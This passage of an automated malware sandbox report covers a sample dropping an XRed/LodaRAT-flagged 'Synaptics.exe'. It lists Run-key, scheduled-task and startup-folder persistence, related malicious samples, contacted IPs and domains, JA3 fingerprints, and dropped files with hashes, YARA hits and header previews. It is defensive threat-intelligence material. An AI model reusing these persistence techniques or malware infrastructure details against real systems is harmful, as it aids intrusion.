                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.50.201.204, 52.168.117.173, 40.126.32.133, 4.245.163.56, 23.1.237.91, 13.107.246.45
                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com, onedscolprdweu10.westeurope.cloudapp.azure.com
                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 6192 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  05:23:03API Interceptor379x Sleep call for process: Synaptics.exe modified
                                                                                                                  05:23:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                  11:22:59Task SchedulerRun new task: HBMQLS.exe path: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                  11:23:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HBMQLS "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                  11:23:09AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                  11:23:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HBMQLS "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                  11:23:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  172.111.138.100mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                          RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                              Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                  gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                                                      69.42.215.252Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                      RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      freedns.afraid.orgSupplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      VOXILITYGBmmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                      • 172.111.138.100
                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 172.111.138.100
                                                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 104.250.189.221
                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 172.111.138.100
                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 172.111.138.100
                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 172.111.138.100
                                                                                                                                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      • 104.243.246.120
                                                                                                                                      nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 46.243.206.70
                                                                                                                                      7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 37.221.166.158
                                                                                                                                      fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 5.254.60.108
                                                                                                                                      AWKNET-LLCUSSupplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252
                                                                                                                                      RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                      • 69.42.215.252

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33
                                                                                                                                      aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 142.250.186.110
                                                                                                                                      • 142.250.186.33

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_ace1313b643a5d083434cea8e6428dfa37df048_455b7b6e_81f95d88-96f6-4cc4-92a6-2d5723e77ae4\Report.wer

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65536
                                                                                                                                      Entropy (8bit):1.1336184905842195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:PluVpsRImE0jM3ODzJDzqjLOA/FFmOVzuiFCZ24IO8EKDzy:IyRFjM3OJqjEqzuiFCY4IO8zy
                                                                                                                                      MD5:C3E3D151F97FA194004517DCDCC7B23F
                                                                                                                                      SHA1:F03E481BD3C625398BC2F90F16E3D98BD0D49C68
                                                                                                                                      SHA-256:80A024940CE898B6D35DCEDFB1AAC8C25816014C592E2F443234D38F12BB873C
                                                                                                                                      SHA-512:A1C738C05E855F1A713FD350E8EF8161EA86C79A4C2C34848BA0DB266E677BFA6A5A2894980A079FDD1603CE21C1E9098890B319B217B413BC940E63D1E4DEFA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.8.2.3.7.7.6.4.8.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.8.3.5.2.9.2.1.2.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.f.9.5.d.8.8.-.9.6.f.6.-.4.c.c.4.-.9.2.a.6.-.2.d.5.7.2.3.e.7.7.a.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.5.d.e.8.2.4.-.2.c.1.8.-.4.7.e.9.-.a.f.4.b.-.6.6.0.c.e.b.5.b.f.6.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.0.-.0.0.0.1.-.0.0.1.4.-.c.2.2.2.-.d.9.c.a.a.4.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AA0.tmp.dmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:23:47 2024, 0x1205a4 type
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4388144
                                                                                                                                      Entropy (8bit):2.0983871520139474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:yYiHXBRNVhv7vibaokuVsDwDO+nbVbUkwNP:yYixV17yzku68bRbc
                                                                                                                                      MD5:30AB73C2A91AED4B07DE0FDCD749F186
                                                                                                                                      SHA1:F116CC903F1E7BE4A3C478AEA325052A0B3D4332
                                                                                                                                      SHA-256:7E54A12FF27440EEA04E11F5F4AE93054AD289E326879439379A6B0CDB119432
                                                                                                                                      SHA-512:AFBE24CAC909C2884DC9AFAEC538568960E6DC26EB6028E89E9ED87C59A01AA706E9FBEFCA00E4A8E717704CF8E88D5122679C4AD5243B43F115EF6E6AFA2098
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MDMP..a..... ........trg............tG...............N......$...0n.....................`.......8...........T..............`\A.........Tn..........@p..............................................................................eJ.......p......GenuineIntel............T.......0....trg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5645.tmp.WERInternalMetadata.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6304
                                                                                                                                      Entropy (8bit):3.7191366439548785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:R6l7wVeJTxD6HsjzYiSqS/pDZ89b/l7sff1m:R6lXJZ6HsXYSp/lAfA
                                                                                                                                      MD5:5D24823AAF20F16076E48327668B240E
                                                                                                                                      SHA1:CF18FFB6D8EB5ECBB0469940D49BA9B02945C5EA
                                                                                                                                      SHA-256:5239A4249B8B307415013D26A0A56FB9F177CE914E5B38CBB46B672388462CEC
                                                                                                                                      SHA-512:78F1A27D038ECEB16EB21E1A262B3AF0011866C0499741AA66ACC3A21C958C23DBC27A17567347B8CF8F2C7F1A190B037793496A2BC2CFAFC5C31E8B39250696
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.9.2.<./.P.i.

                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5694.tmp.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4572
                                                                                                                                      Entropy (8bit):4.44237744906499
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:cvIwWl8zs4MuJg77aI9zgWpW8VY+PYm8M4JFWFjB+q84Yc5Z3d:uIjfXkI7tZ7VrSJw+mZ3d
                                                                                                                                      MD5:BE098A429CA3CFF39C5C4BF92AA7A269
                                                                                                                                      SHA1:721A02D9985B4113D72F208567036F8A7159D2F0
                                                                                                                                      SHA-256:3B7D7BE239D5F9C1DD411E38CB5D7C8FA2DF66DA90A3E1F20663E7F3222FE545
                                                                                                                                      SHA-512:357A9EAAC56EDDC75534EFB3AEDFD2817EC686443F70327D9C578D75D7FEE37B55F320F366D685ACC18760B66058E9CAD144420F429EA5A0B7CDF99D7DA18270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                      C:\ProgramData\Synaptics\RCX6FEC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):771584
                                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX6FEC.tmp, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1723904
                                                                                                                                      Entropy (8bit):7.463863136848696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                      MD5:71386F37F17778126296CA734975DB6D
                                                                                                                                      SHA1:353818DCD74D06565FC0E8AC4416E594D29ECD0B
                                                                                                                                      SHA-256:C1317DA0FD0DC3D73B38634EA586016F6F651F52ACC576FBAE8B82721C83E9AE
                                                                                                                                      SHA-512:E5E0D87F91611BCCFEA16222C9AFB7AC7B949F1762244CED01F9D8A78E2C992CFE8C1FAAF1391F4CF107604A0E9F7A64FA4ADDA1C339D8DC85B27E7BE610B83C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\222.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                      C:\Users\user\AppData\Local\Temp\3hOVQZ7.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2583758431415335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0hASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2A+pAZewRDK4mW
                                                                                                                                      MD5:BF18B7D5E1AD23035CAD13A7933DF197
                                                                                                                                      SHA1:896CE74C80294932CE6C950CC2A6F33A8A88BC29
                                                                                                                                      SHA-256:BC5554BF04B3DEA7DDEE20573157A1E173697B1328E531C95D360045AB1AC641
                                                                                                                                      SHA-512:18DBCCDF44E214904220763619D69AB449F4A47D123CC76D2D809E50CB3A10626B4DA6637E844593872BADBF9033B183A72C551E33EA5765322F66F9A6D60D3E
                                                                                                                                      Malicious:false
